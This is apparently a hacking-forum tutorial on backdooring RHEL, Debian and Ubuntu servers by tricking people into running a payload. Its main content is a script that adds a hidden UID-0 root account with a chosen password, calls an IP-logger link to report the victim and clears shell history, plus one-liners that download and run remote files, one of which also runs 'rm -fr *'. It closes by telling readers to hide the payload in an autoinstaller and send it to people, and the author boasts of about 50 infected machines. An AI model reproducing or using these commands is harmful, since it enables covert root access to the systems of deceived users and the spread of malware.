[TUT] How to backdoor servers

1. [UPDATED 10/26/2020]
2.  
3. ██████╗░░█████╗░░█████╗░██╗░░██╗██████╗░░█████╗░░█████╗░██████╗░██╗███╗░░██╗░██████╗░
4. ██╔══██╗██╔══██╗██╔══██╗██║░██╔╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║████╗░██║██╔════╝░
5. ██████╦╝███████║██║░░╚═╝█████═╝░██║░░██║██║░░██║██║░░██║██████╔╝██║██╔██╗██║██║░░██╗░
6. ██╔══██╗██╔══██║██║░░██╗██╔═██╗░██║░░██║██║░░██║██║░░██║██╔══██╗██║██║╚████║██║░░╚██╗
7. ██████╦╝██║░░██║╚█████╔╝██║░╚██╗██████╔╝╚█████╔╝╚█████╔╝██║░░██║██║██║░╚███║╚██████╔╝
8. ╚═════╝░╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝░╚═════╝░
9.  
10. [*] This tutorial is going to show you how to successfully backdoor RHEL,debian, ubuntu machines.
11.  
12. [0x1 - Introduction]
13. This is a very simple method, some people might know about it some may not, what makes this method so effective is human mistakes. A lot of people can't read code or just completely skip over
14. the infect line! I've infected atleast 50 boxes in a week. It's pretty effective! http://prntscr.com/fc1a2g http://prntscr.com/fc1cbx http://prntscr.com/fc1cfz
15.  
16.  
17. [0x2 - Credits]
18. Website: http://leakedfiles.org/
19. Pastebin: https://www.instagram.com/jihadi4potus/
20. Twitter: https://twitter.com/Jihadi4Potus
21. Instagram: https://www.instagram.com/jihadi4potus/
22. Discord: https://discord.gg/JQW3rpQ
23.  
24. [0x3 - Requirements]
25. 1x Brain
26. 1x Domain
27. 1x VPS server
28.  
29. [0x4 - Begin]
30. 1) Go to [Namecheap.com or dot.tk] and register a domain, the link your vps hosting to the domain.
31.  
32. [Commands]
33. [RHEL Machines]
34. yum update -y && yum install httpd php wget curl nano -y && service iptables stop && chkconfig iptables off
35.  
36. [Ubuntu/Deb]
37. apt update && apt upgrade && sudo apt install apache2 php wget curl nano && service firewalld stop && chkconfig firewalld off
38.  
39. 2) Go to http://blasze.tk and make an logger link, once you have this save the tracking url!
40.  
41. 3) Go to your /var/www/html directory [cd /var/www/html], make a file, name it whatever you want. [touch .a] Edit your file and edit the following ->
42.  
43.  
44. #!/bin/bash
45.  
46. useradd -o -u 0 -g 0 -M -d /root -s /bin/bash USERNAME; echo -e "PASSWORD\nPASSWORD" | passwd USERNAME; wget -q -O /tmp/... http://blasze logger link here!; clear; history -c
47.  
48.  
49. 4) Set your sh file with executing permissions [chmod +x file.sh]
50.  
51. 5) Now for your payload should look something like this:
52. wget -q http://files.org/file -O .l; chmod +x FILE; nohup ./FILE </dev/null/ >/dev/null 2>&1
53. or
54. cd /tmp; wget http://site.com/script.sh -O a.sh; sh a.sh; rm -fr *; clear; history -c
55.  
56.  
57. 6) Congratz! You've setup your backdoor! Now send your payload to people or hide it in a autoinstaller and wait for the ips to come in! The ips will show up on your blasze.tk/track/